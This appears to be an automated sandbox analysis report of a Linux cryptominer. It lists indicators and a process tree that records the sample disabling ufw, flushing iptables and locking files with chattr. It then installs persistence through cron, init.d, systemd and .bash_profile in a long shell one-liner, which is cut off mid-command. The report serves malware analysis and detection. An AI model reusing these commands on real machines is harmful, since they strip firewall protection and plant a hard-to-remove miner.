File opened for reading	/sys/bus/node/devices/node0/access0/initiators	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	service-agent
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	service-agent

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/864/status	pkill
File opened for reading	/proc/89/cmdline	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/3/status	Process not Found
File opened for reading	/proc/171/cmdline	Process not Found
File opened for reading	/proc/164/status	Process not Found
File opened for reading	/proc/860/stat	Process not Found
File opened for reading	/proc/501/stat	ps
File opened for reading	/proc/16/stat	Process not Found
File opened for reading	/proc/491/status	Process not Found
File opened for reading	/proc/1141/status	Process not Found
File opened for reading	/proc/500/stat	Process not Found
File opened for reading	/proc/616/stat	ps
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/76/status	ps
File opened for reading	/proc/self/auxv	Process not Found
File opened for reading	/proc/14/stat	Process not Found
File opened for reading	/proc/23/status	Process not Found
File opened for reading	/proc/4169/status	ps
File opened for reading	/proc/615/status	ps
File opened for reading	/proc/1458/status	Process not Found
File opened for reading	/proc/93/status	Process not Found
File opened for reading	/proc/1039/status	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/1047/cmdline	ps
File opened for reading	/proc/102/stat	Process not Found
File opened for reading	/proc/500/status	Process not Found
File opened for reading	/proc/1703/status	pkill
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/803/status	ps
File opened for reading	/proc/803/status	Process not Found
File opened for reading	/proc/5495/status	Process not Found
File opened for reading	/proc/200/stat	Process not Found
File opened for reading	/proc/1025/stat	ps
File opened for reading	/proc/1025/cmdline	ps
File opened for reading	/proc/893/stat	ps
File opened for reading	/proc/5233/stat	Process not Found
File opened for reading	/proc/1083/cmdline	pgrep
File opened for reading	/proc/sys/kernel/osrelease	Process not Found
File opened for reading	/proc/1131/cmdline	Process not Found
File opened for reading	/proc/166/status	Process not Found
File opened for reading	/proc/1110/cmdline	Process not Found
File opened for reading	/proc/998/stat	Process not Found
File opened for reading	/proc/174/cmdline	Process not Found
File opened for reading	/proc/1077/cmdline	Process not Found
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/615/status	ps
File opened for reading	/proc/92/status	pkill
File opened for reading	/proc/158/status	ps
File opened for reading	/proc/1/status	Process not Found
File opened for reading	/proc/396/status	Process not Found
File opened for reading	/proc/4164/status	ps
File opened for reading	/proc/692/cmdline	Process not Found
File opened for reading	/proc/175/status	Process not Found
File opened for reading	/proc/1083/cmdline	Process not Found
File opened for reading	/proc/1301/stat	ps
File opened for reading	/proc/1035/status	ps
File opened for reading	/proc/2/cmdline	ps
File opened for reading	/proc/579/status	ps
File opened for reading	/proc/1525/stat	Process not Found
File opened for reading	/proc/864/status	pkill
File opened for reading	/proc/3806/cmdline	ps
File opened for reading	/proc/454/status	pkill
File opened for reading	/proc/84/cmdline	pkill

Writes file to tmp directory 35 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.klibsystem5	Process not Found
File opened for modification	/tmp/.lock	Process not Found
File opened for modification	/tmp/.bashirc	Process not Found
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/~/.bash_profile	Process not Found
File opened for modification	/tmp/.lock	Process not Found
File opened for modification	/tmp/~/.bash_profile	Process not Found
File opened for modification	/tmp/.bashirc	Process not Found
File opened for modification	/tmp/sys-helper	Process not Found
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/sys-helper	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/tmp/.lock	Process not Found
File opened for modification	/tmp/.bashirc	Process not Found
File opened for modification	/tmp/.lock	Process not Found
File opened for modification	/tmp/.bashirc	Process not Found
File opened for modification	/tmp/service-agent	Process not Found
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/~/.bash_profile	Process not Found
File opened for modification	/tmp/.lock	Process not Found
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/~/.bash_profile	Process not Found
File opened for modification	/tmp/service-agent	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.bashirc	Process not Found
File opened for modification	/tmp/~/.bash_profile	Process not Found
File opened for modification	/tmp/~/.bash_profile	Process not Found
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.lock	Process not Found

GoLang User-Agent 5 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	77	Go-http-client/1.1
HTTP User-Agent header	87	Go-http-client/1.1
HTTP User-Agent header	95	Go-http-client/1.1
HTTP User-Agent header	44	Go-http-client/1.1
HTTP User-Agent header	64	Go-http-client/1.1

/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
PID:1488
- /usr/bin/bash
  bash -c "ufw disable"
  2⤵
  PID:1504
- /usr/sbin/ufw
  ufw disable
  2⤵
  PID:1504
- - /usr/sbin/iptables
    /usr/sbin/iptables -V
    3⤵
    PID:1509
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1511
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1512
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        
        PID:1515
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1521
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1531
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1532
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1533
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1537
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1538
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1539
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1540
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1541
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1542
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1544
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1545
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1553
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1554
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1555
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1556
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1557
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1560
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1588
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1602
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1603
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1604
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1605
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1609
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1610
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1611
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1612
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1613
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1614
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1615
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1616
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1617
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1618
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1619
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1620
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1621
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1622
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1623
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1624
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1634
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1665
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1666
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1667
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1683
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1686
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1691
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1692
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1694
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1695
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1696
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1697
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1699
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1700
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1701
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1702
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1704
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1705
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1706
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1707
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1708
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1709
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1710
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1711
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1712
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1713
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1714
- /usr/bin/bash
  bash -c "iptables -P INPUT ACCEPT"
  2⤵
  PID:1715
- /usr/sbin/iptables
  iptables -P INPUT ACCEPT
  2⤵
  PID:1715
- /usr/bin/bash
  bash -c "iptables -P OUTPUT ACCEPT"
  2⤵
  PID:1716
- /usr/sbin/iptables
  iptables -P OUTPUT ACCEPT
  2⤵
  PID:1716
- /usr/bin/bash
  bash -c "iptables -P FORWARD ACCEPT"
  2⤵
  PID:1717
- /usr/sbin/iptables
  iptables -P FORWARD ACCEPT
  2⤵
  PID:1717
- /usr/bin/bash
  bash -c "iptables -F"
  2⤵
  PID:1721
- /usr/sbin/iptables
  iptables -F
  2⤵
  PID:1721
- /usr/bin/bash
  bash -c "chattr -ia /etc/ld.so.preload"
  2⤵
  PID:1722
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  PID:1722
- /usr/bin/pgrep
  pgrep -f klibsystem4
  2⤵
  - Reads runtime system information
  PID:1733
- /usr/bin/pgrep
  pgrep -f klibsystem5
  2⤵
  PID:1742
- /usr/bin/chattr
  chattr +ia /etc/init.d/knlib
  2⤵
  PID:1764
- /etc/init.d/knlib
  /etc/init.d/knlib start
  2⤵
  - Executes dropped EXE
  PID:1775
- - /usr/bin/cp
    cp -f -r -- /bin/knlib5 /bin/klibsystem5
    3⤵
    PID:1776
- - /usr/bin/rm
    rm -rf -- klibsystem5
    3⤵
    PID:1778
- - /usr/bin/nohup
    nohup ./klibsystem5
    3⤵
    PID:1777
- /usr/bin/chattr
  chattr +ia /etc/systemd/system/knlibe.service
  2⤵
  PID:1781
- /usr/bin/systemctl
  systemctl daemon-reload
  2⤵
  - Reads EFI boot settings
  PID:1785
- /usr/bin/systemctl
  systemctl enable knlibe.service
  2⤵
  - Reads EFI boot settings
  PID:1989
- /usr/bin/chattr
  chattr +ia /bin/knlib5
  2⤵
  PID:2074
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:2075
- /usr/bin/pkill
  pkill -f .klibsystem5
  2⤵
  - Reads runtime system information
  PID:2076
- /usr/bin/pkill
  pkill -f .klibsystem4
  2⤵
  - Reads runtime system information
  PID:2088
- /usr/bin/bash
  bash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"
  2⤵
  PID:2097
- - /usr/bin/crontab
    crontab -
    3⤵
    PID:2100
- /usr/bin/chattr
  chattr +ia /etc/cron.d/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:2107
- /usr/bin/chattr
  chattr +ia /var/spool/cron/.lib-knlib4
  2⤵
  PID:2109
- /usr/bin/chattr
  chattr +ia /etc/cron.hourly/.lib-knlib4
  2⤵
  PID:2111
- /usr/bin/chattr
  chattr +ia /etc/cron.daily/.lib-knlib4
  2⤵
  PID:2119
- /usr/bin/chattr
  chattr +ia /etc/cron.weekly/.lib-knlib4
  2⤵
  PID:2128
- /usr/bin/chattr
  chattr +ia /etc/cron.monthly/.lib-knlib4
  2⤵
  PID:2138
- /usr/bin/chattr
  chattr -ia /etc/anacrontab
  2⤵
  PID:2145
- /usr/bin/chattr
  chattr +ia /etc/anacrontab
  2⤵
  PID:2149
- /tmp/sys-helper
  /tmp/sys-helper
  2⤵
  - Executes dropped EXE
  - Writes file to tmp directory
  PID:2152
- /tmp/service-agent
  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  PID:2154
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    PID:2155
  - - /usr/bin/whoami
      whoami
      4⤵
      PID:2166
  - - /usr/bin/hostname
      hostname
      4⤵
      PID:2167
  - - /usr/bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2168
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2184
  - - /usr/bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:2186
  - - /usr/bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2185
  - - /usr/bin/id
      id -u
      4⤵
      PID:2188
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:2191
  - - /usr/bin/grep
      grep /etc/cron
      4⤵
      PID:2190
  - - /usr/bin/ps
      ps x
      4⤵
      PID:2189
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock 